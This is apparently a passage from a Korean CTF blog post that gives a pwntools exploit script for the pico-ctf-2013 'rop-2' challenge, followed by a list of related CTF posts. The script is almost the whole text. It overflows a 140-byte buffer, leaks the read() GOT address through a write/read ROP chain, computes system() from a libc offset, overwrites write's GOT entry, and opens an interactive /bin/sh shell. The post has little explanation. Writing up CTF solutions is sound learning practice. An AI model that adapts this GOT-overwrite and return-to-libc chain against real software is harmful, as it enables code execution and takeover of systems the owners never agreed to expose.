rop-1과 동일하다.
exploit code
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 | from pwn import * p = process('./rop2-20f65dd0bcbe267d') read_plt = 0x8048380read_got = 0x804a000write_plt = 0x80483d0write_got = 0x804a014bss = 0x804a028system_offset = 0x9ad60pppr = 0x804859dpr = 0x8048364binsh = "/bin/sh" payload = "A"*140payload += p32(write_plt)payload += p32(pppr)payload += p32(1)payload += p32(read_got)payload += p32(4) payload += p32(read_plt)payload += p32(pppr)payload += p32(0)payload += p32(bss)payload += p32(len(binsh)+1) payload += p32(read_plt)payload += p32(pppr)payload += p32(0)payload += p32(write_got)payload += p32(4) payload += p32(write_plt)payload += p32(pr)payload += p32(bss) log.info("Exploit..")p.sendline(payload) read_addr = u32(p.recv()[-4:])log.info("read_addr = {}".format(hex(read_addr)))system_addr = read_addr - system_offsetlog.info("system_addr = {}".format(hex(system_addr))) p.sendline(binsh)p.sendline(p32(system_addr))p.interactive() |
'CTF' 카테고리의 다른 글
| pico-ctf-2013 rop-4 (0) | 2018.07.17 |
|---|---|
| pico-ctf-2013 rop-3 (0) | 2018.07.14 |
| pico-ctf-2013 rop-1 (0) | 2018.07.14 |
| PlaidCTF 2013 ropasaurusrex (0) | 2018.07.14 |
| Defcon 2015 r0pbaby (0) | 2018.07.13 |